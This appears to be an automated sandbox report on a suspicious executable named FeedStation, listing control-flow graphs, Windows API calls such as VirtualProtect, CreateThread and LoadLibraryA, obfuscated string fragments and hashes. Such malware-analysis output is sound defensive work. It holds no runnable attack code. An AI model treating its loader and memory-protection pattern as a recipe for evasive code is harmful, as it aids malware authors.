                                                                                                                                                                                                                            • Instruction ID: 1923fef6226d699df834783176e8e38aa3c20cc328af0cc6c116a873d4128778
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA410071A00109AFDB18DF98C490BAEB7F6EF88300F10C169E6169B794DB74EE45CB55

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 343 24e0d25-24e0d7c GetPEB 344 24e0d87-24e0d8b 343->344 345 24e0e2b-24e0e32 344->345 346 24e0d91-24e0d9c 344->346 349 24e0e3d-24e0e41 345->349 347 24e0e26 346->347 348 24e0da2-24e0db9 346->348 347->344 350 24e0dde-24e0df6 CreateThread 348->350 351 24e0dbb-24e0ddc 348->351 353 24e0e52-24e0e59 349->353 354 24e0e43-24e0e50 349->354 358 24e0dfa-24e0e02 350->358 351->358 356 24e0e5b-24e0e5d 353->356 357 24e0e62-24e0e67 353->357 354->349 356->357 358->347 360 24e0e04-24e0e21 358->360 360->347
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 024E0DF1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                            • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                            • Instruction ID: 41fdac1bb77d5538c96166b8d8f9de73fc738b00082b5b7491cfd33669705a2e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6541D774A00209EFDB14DF98C994BAEB7B1FF48315F2081A9D5166B380C775AE81CF94

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 390 24e0765-24e08cd call 24e0d15 call 24e1315 call 24e14c5 call 24e10b5 399 24e0cfe-24e0d01 390->399 400 24e08d3-24e08da 390->400 401 24e08e5-24e08e9 400->401 402 24e090b-24e0986 GetPEB 401->402 403 24e08eb-24e0909 call 24e1235 401->403 404 24e0991-24e0995 402->404 403->401 406 24e09ad-24e09bf call 24e0e75 404->406 407 24e0997-24e09ab 404->407 413 24e09e9-24e0a0a CreateThread 406->413 414 24e09c1-24e09e7 406->414 407->404 415 24e0a0d-24e0a11 413->415 414->415 417 24e0a17-24e0a4a call 24e1375 415->417 418 24e0cd2-24e0cf5 415->418 417->418 422 24e0a50-24e0a9f 417->422 418->399 424 24e0aaa-24e0ab0 422->424 425 24e0af8-24e0afc 424->425 426 24e0ab2-24e0ab8 424->426 429 24e0bca-24e0cbd call 24e0e75 call 24e0d15 call 24e1315 425->429 430 24e0b02-24e0b0f 425->430 427 24e0aba-24e0ac9 426->427 428 24e0acb-24e0acf 426->428 427->428 431 24e0af6 428->431 432 24e0ad1-24e0adf 428->432 456 24e0cbf 429->456 457 24e0cc2-24e0ccc 429->457 433 24e0b1a-24e0b20 430->433 431->424 432->431 434 24e0ae1-24e0af3 432->434 437 24e0b22-24e0b30 433->437 438 24e0b50-24e0b53 433->438 434->431 439 24e0b4e 437->439 440 24e0b32-24e0b41 437->440 441 24e0b56-24e0b5d 438->441 439->433 440->439 443 24e0b43-24e0b4c 440->443 441->429 445 24e0b5f-24e0b68 441->445 443->438 445->429 448 24e0b6a-24e0b7a 445->448 450 24e0b85-24e0b91 448->450 452 24e0bc2-24e0bc8 450->452 453 24e0b93-24e0bc0 450->453 452->441 453->450 456->457 457->418
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 024E0A08
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                            • Opcode ID: 55b8e2d1dc4a6f8256d26a117e56ad450ce356ed9e4239e88acab8a67bca37ac
                                                                                                                                                                                                                            • Instruction ID: 1eb2bbf240ca7cd80948fd20d30088498a44fc3c2f36431ec24ba53b96d94266
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b8e2d1dc4a6f8256d26a117e56ad450ce356ed9e4239e88acab8a67bca37ac
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2312B4B0E00219DFEB14CF98C990BAEBBB1FF48305F2482A9D516AB385D7746A45CF54

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 203 252e67a-252e694 call 2530898 206 252e696-252e697 203->206 207 252e69c-252e6b5 call 2530936 203->207 208 252e771-252e774 206->208 211 252e6bb-252e6c6 207->211 212 252e76d 207->212 211->212 213 252e6cc-252e6da VirtualProtect 211->213 214 252e76f-252e770 212->214 213->212 215 252e6e0-252e722 call 253088e call 2530f06 VirtualProtect call 2530936 213->215 214->208 215->212 222 252e724-252e730 215->222 222->212 223 252e732-252e740 VirtualProtect 222->223 223->212 224 252e742-252e76b call 253088e call 2530f06 VirtualProtect 223->224 224->214
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 02530898: LoadLibraryA.KERNEL32(00000000,?,?), ref: 0253092A
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 0252E6D5
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 0252E708
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 0252E73B
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 0252E765
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 895956442-0
                                                                                                                                                                                                                            • Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                                                                                                                                                                                                                            • Instruction ID: c307eaa00d6a419bb07c84a718e96dc1121d9159f93e490be2cc9ef5fcbecd83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C721B77210435A7FE310BA618D85FB7779DEB87704F04083ABB46D10D1E765B5098679

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 229 252f4ea-252f54e call 2530a91 * 3 236 252f550-252f552 229->236 237 252f578 229->237 236->237 238 252f554-252f556 236->238 239 252f57b-252f585 237->239 238->237 240 252f558-252f56a VirtualAlloc 238->240 241 252f586-252f5a9 call 2530f06 call 2530f2a 240->241 242 252f56c-252f573 240->242 248 252f5f3-252f60c call 2530a91 241->248 249 252f5ab-252f5e1 call 2530bfe call 2530ad4 241->249 242->237 243 252f575 242->243 243->237 248->237 255 252f612 248->255 258 252f842-252f84b 249->258 259 252f5e7-252f5ed 249->259 257 252f618-252f61e 255->257 260 252f620-252f626 257->260 261 252f65a-252f663 257->261 264 252f852-252f85a 258->264 265 252f84d-252f850 258->265 259->248 259->258 266 252f628-252f62b 260->266 262 252f665-252f66b 261->262 263 252f6bc-252f6c7 261->263 269 252f66f-252f68a call 2530a91 262->269 272 252f6e0-252f6e3 263->272 273 252f6c9-252f6d2 call 252e7de 263->273 270 252f889 264->270 271 252f85c-252f887 call 2530f2a 264->271 265->264 265->270 267 252f63f-252f641 266->267 268 252f62d-252f632 266->268 267->261 277 252f643-252f651 call 2530898 267->277 268->267 276 252f634-252f63d 268->276 294 252f6a9-252f6ba 269->294 295 252f68c-252f694 269->295 274 252f88d-252f8ad call 2530f2a VirtualFree 270->274 271->274 278 252f6e9-252f6f2 272->278 279 252f83e 272->279 273->279 290 252f6d8-252f6de 273->290 298 252f8b3-252f8b5 274->298 299 252f8af-252f8b1 RtlExitUserProcess 274->299 276->266 276->267 291 252f656-252f658 277->291 285 252f6f4 278->285 286 252f6f8-252f6ff 278->286 279->258 285->286 292 252f701-252f70a call 252e67a 286->292 293 252f72f-252f733 286->293 290->286 291->257 309 252f718-252f719 call 252e775 292->309 310 252f70c-252f712 292->310 296 252f7d5-252f7d8 293->296 297 252f739-252f75b 293->297 294->263 294->269 295->279 301 252f69a-252f6a3 295->301 303 252f82a-252f82c call 252fc1a 296->303 304 252f7da-252f7dd 296->304 297->279 314 252f761-252f774 call 2530f06 297->314 298->239 299->298 301->279 301->294 313 252f831-252f832 303->313 304->303 306 252f7df-252f7e2 304->306 311 252f7e4-252f7e6 306->311 312 252f7fb-252f80c call 252f2db 306->312 320 252f71e-252f721 309->320 310->279 310->309 311->312 316 252f7e8-252f7eb 311->316 330 252f80e-252f81a call 252f8ba 312->330 331 252f81d-252f828 call 252eda7 312->331 317 252f833-252f83a 313->317 328 252f776-252f77a 314->328 329 252f798-252f7d1 314->329 321 252f7f2-252f7f9 call 2530488 316->321 322 252f7ed-252f7f0 316->322 317->279 323 252f83c 317->323 320->293 326 252f723-252f729 320->326 321->313 322->317 322->321 323->323 326->279 326->293 328->329 333 252f77c-252f77f 328->333 329->279 341 252f7d3 329->341 330->331 331->313 333->296 337 252f781-252f796 call 2530d09 333->337 337->341 341->296
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0252F564
                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0252F8A8
                                                                                                                                                                                                                            • RtlExitUserProcess.NTDLL(00000000), ref: 0252F8B1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocExitFreeProcessUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1828502597-0
                                                                                                                                                                                                                            • Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                                                                                                                                                                                                            • Instruction ID: 1e9d581a0d41e67f4a5aadc47e68ad7fa0074864b774dfbb3e25679510d3e12e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05B12532500712ABDB259F60EC80BABFBF9FF46314F240529E549829D0E731F559CB99

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 362 2530898-25308ab 363 25308c3-25308cd 362->363 364 25308ad-25308b0 362->364 365 25308cf-25308d7 363->365 366 25308dc-25308e8 363->366 367 25308b2-25308b5 364->367 365->366 369 25308eb-25308f0 366->369 367->363 368 25308b7-25308c1 367->368 368->363 368->367 370 2530923-253092a LoadLibraryA 369->370 371 25308f2-25308fd 369->371 374 253092d-2530931 370->374 372 2530919-253091d 371->372 373 25308ff-2530917 call 2530f66 371->373 372->369 376 253091f-2530921 372->376 373->372 378 2530932-2530934 373->378 376->370 376->374 378->374
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?), ref: 0253092A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                            • String ID: .dll
                                                                                                                                                                                                                            • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                            • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                            • Instruction ID: e0c3c108883e0d31f5e11cd012f2b262a03796eedfc9c436e0107166954bd45b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D721E4766043859FE722CFA8C884B6ABFA8FF05324F08516DD8418BA81D730E845CB88

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 379 252e775-252e7a2 call 2530898 call 2530936 384 252e7a4-252e7b2 VirtualProtect 379->384 385 252e7d8 379->385 384->385 387 252e7b4-252e7d6 call 2530f06 VirtualProtect 384->387 386 252e7da-252e7dd 385->386 387->386
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 02530898: LoadLibraryA.KERNEL32(00000000,?,?), ref: 0253092A
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 0252E7AD
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 0252E7D0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 895956442-0
                                                                                                                                                                                                                            • Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                                                                                                                                                                                                            • Instruction ID: 69721b5c0567a50cc24648641bf35af0e653955cdcfb56466f4135740e68c133
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F081B21406147AF611A665CC42FFB77ECEB85A11F040428FB06D60C0E771B6058BA9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $"$"$'$($+$-$-$-$-$.$.$/$/$/$0$1$2$2$2$3$4$5$6$7$8$9$9$;$=$>$?$?$B$B$D$D$E$F$H$I$I$K$K$K$K$L$L$M$O$P$P$Q$Q$R$R$T$U$U$V$V$W$W$X$X$Z$Z$\$^$`$e$f$f$j$j$k$l$m$n$p$p$q$t$w$x$x$y${
                                                                                                                                                                                                                            • API String ID: 0-475241549
                                                                                                                                                                                                                            • Opcode ID: 906ba59493c2f70ab94024ff61eb43d05a96a63e8b4e3143cfa70f6e8341602c
                                                                                                                                                                                                                            • Instruction ID: b59dd90653777beef140142f0ed505e59a97f31aed7ee90eb8c92ec5a4ef6823
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 906ba59493c2f70ab94024ff61eb43d05a96a63e8b4e3143cfa70f6e8341602c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E713BD3150C7C18AD375DB3884443AFBBE2ABD6324F098A6ED5EA873D1DA748446CB53

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 892 25152dd-25156a1 893 25156a3-25156a8 892->893 894 25156d7-2515710 893->894 895 25156aa-25156d5 893->895 896 2515712-2515715 894->896 895->893 897 2515717-251572c 896->897 898 251572e-2515798 896->898 897->896 899 251579a-251579d 898->899 900 25157f7-2515825 899->900 901 251579f-25157f5 899->901 902 2515827-251582a 900->902 901->899 903 2515843-25158a2 902->903 904 251582c-2515841 902->904 905 25158a4-25158a7 903->905 904->902 906 25158f9-2515918 905->906 907 25158a9-25158f7 905->907 908 251591a-251591d 906->908 907->905 909 2515947-251594a 908->909 910 251591f-2515945 908->910 911 251594c-2515952 909->911 910->908 912 2515954 911->912 913 2515959-251596b 911->913 914 25159de-2515a11 912->914 915 251596d 913->915 916 251596f-2515975 913->916 917 25159cf-25159d2 915->917 916->917 918 2515977-25159cc call 251c0d2 916->918 919 25159d4 917->919 920 25159d6-25159d9 917->920 918->917 919->914 920->911
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $!$#$%$'$)$+$-$/$1$3$4$5$7$9$9$;$=$?$C$K$L$L$M$M$O$O$Q$Q$R$R$S$U$U$V$W$Y$[$]$^$_$_$a$k$k$k$m$o$o$q$s$u$u$w$y$z${${
                                                                                                                                                                                                                            • API String ID: 0-2966811575
                                                                                                                                                                                                                            • Opcode ID: 2581c959981cfe26736055786fb7a9c9f082cac7fa32867cf63a1538540ca70d
                                                                                                                                                                                                                            • Instruction ID: caabb0c7acc920ab16ddd68954c85f3ea958ee7eb258120366338247487bd31d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2581c959981cfe26736055786fb7a9c9f082cac7fa32867cf63a1538540ca70d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 642230219087EA89DB32C67C8C087DDBEA11B63324F0847D9D5E96B2D2D3750B85CB66

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 924 2516021-251617f 925 2516181-2516184 924->925 926 25161a3-25161e0 925->926 927 2516186-25161a1 925->927 928 25161e2-25161e5 926->928 927->925 929 25161e7-25161fc 928->929 930 25161fe-2516268 928->930 929->928 931 251626a-251626d 930->931 932 2516295-25162c3 931->932 933 251626f-2516293 931->933 934 25162c5-25162c8 932->934 933->931 935 25162e1-251633d 934->935 936 25162ca-25162df 934->936 937 251633f-2516342 935->937 936->934 938 2516344-251638c 937->938 939 251638e-25163ad 937->939 938->937 940 25163af-25163b2 939->940 941 25163b4-25163da 940->941 942 25163dc-25163df 940->942 941->940 943 25163e1-25163e7 942->943 944 25163e9 943->944 945 25163ee-2516400 943->945 946 2516473-2516498 944->946 947 2516402 945->947 948 2516404-251640a 945->948 949 2516464-2516467 947->949 948->949 950 251640c-2516461 call 251c0d2 948->950 952 2516469 949->952 953 251646b-251646e 949->953 950->949 952->946 953->943
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: &$0$<$>$?$@$A$B$D$F$I$L$N$S$`$b$c$d$f$h$j$l$n$p$r$t$v$x$z$|$~
                                                                                                                                                                                                                            • API String ID: 0-2711495387
                                                                                                                                                                                                                            • Opcode ID: aadb9f6d3dc9a9009c455ba88745c7d5257f07ec00266d52a1766d257a0c4ee8
                                                                                                                                                                                                                            • Instruction ID: 32444aeecb9eeed7c8bb00f77161f74ff3b2eaad8136a3b0dcab50b6f91c56aa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aadb9f6d3dc9a9009c455ba88745c7d5257f07ec00266d52a1766d257a0c4ee8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27E170219087E98EDB32C67C88443DDBFA16B53224F1843D8D4E9AB3D2C7754A85CB66

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 957 2504962-2504b2d 958 2504b32-2504b5e 957->958 958->958 959 2504b60-2504e0a 958->959 960 2504e12-2504e86 959->960 960->960 961 2504e88-2505077 960->961 962 2505082-25050b8 961->962 962->962 963 25050ba-25052a6 962->963 964 25052b2-25052e1 963->964 964->964 965 25052e3-25054d8 964->965 966 25054e2-2505537 965->966 966->966 967 2505539-250559e 966->967
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: !G$'t+v$-M)O$3AbC$3UvW$9Q<S$;I9K$;_$>]-_$D1n3$G%T'$G)Y+$G5A7$JG$LM$M9y;$N]$OD$S=I?$`a$c5_7$l1K3$m!K#$z=x?$|!m#
                                                                                                                                                                                                                            • API String ID: 0-2088926519
                                                                                                                                                                                                                            • Opcode ID: 04c7323f5b57a6440de9a12a99b57cbabf3c0dd89c585ad329e8b931b2b7c45f
                                                                                                                                                                                                                            • Instruction ID: 6972e0adf18188943a42d5b57ce413e63820be1388f46dceddd1366630a53bbf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04c7323f5b57a6440de9a12a99b57cbabf3c0dd89c585ad329e8b931b2b7c45f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0420BB160C7848AD334CF55E842BCBBAF2EBC2344F018C2DC5E95B246DB71854A8B97
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: !$+$+$=$>$A$W$Y$^$_$a$q$r$w$x
                                                                                                                                                                                                                            • API String ID: 0-1903934733
                                                                                                                                                                                                                            • Opcode ID: c72b3dbd0ac8f7998619dc0ac791d4a5c7b8c0bf5ab5689da4cfe29e2eca5f4b
                                                                                                                                                                                                                            • Instruction ID: efd1a46900ea1ed683e1c6a9ab6fee6bf2b5707f4ca5d3ddb754d9004bb5b085
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c72b3dbd0ac8f7998619dc0ac791d4a5c7b8c0bf5ab5689da4cfe29e2eca5f4b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0828D7160C7908BD768DB38C4943AFBBE2ABC5314F098A6ED5DE87381D6798845CB43
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: !@$,$G$P$P$R$S$S$T$T$W$]$^$}
                                                                                                                                                                                                                            • API String ID: 0-1306667988
                                                                                                                                                                                                                            • Opcode ID: f88ad0a9d7d72f4720d78aad85d15e6950f1308f06f1ecf526e9ee72e3b946b2
                                                                                                                                                                                                                            • Instruction ID: 2bac4d4ec3e3bc69d87ff4cc37540e5ac70646a7f05a991bc5a254b0e741a9ba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f88ad0a9d7d72f4720d78aad85d15e6950f1308f06f1ecf526e9ee72e3b946b2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9522907160C7818FD3249B28C89876EBBE1BB85314F188A2DE9DAC73D1D7798845CB47
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: "9b($&sjz$4lT&$66/($LPUU$MKYD$OFK[$V+41$Z[ST$fVXX$gscg$mRjT$szwg
                                                                                                                                                                                                                            • API String ID: 0-124522135
                                                                                                                                                                                                                            • Opcode ID: 80392348d36f0f8f2d0d5e7841bd84b0b3d09eb3fc40c5e422f88eb75baf3c4d
                                                                                                                                                                                                                            • Instruction ID: 6cd68d237fa6d4ab7c98323c07db468e2f66e889489244faf3da8365ccd82cbe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80392348d36f0f8f2d0d5e7841bd84b0b3d09eb3fc40c5e422f88eb75baf3c4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D852147150C3918FD721CF24C88076BBBE1AFD6314F098A6EE8E49B392D775850ACB52
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $$2$6$D$O$T$T$w
                                                                                                                                                                                                                            • API String ID: 0-2635766767
                                                                                                                                                                                                                            • Opcode ID: fab728461717a67d840526f6e8ac537f6d741b873b6e85f182b949f1bdffb2ed
                                                                                                                                                                                                                            • Instruction ID: 6428b6958c22109a3dc611467dd69f8bca18b6697f3cbb66ca389e606cea9af4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fab728461717a67d840526f6e8ac537f6d741b873b6e85f182b949f1bdffb2ed
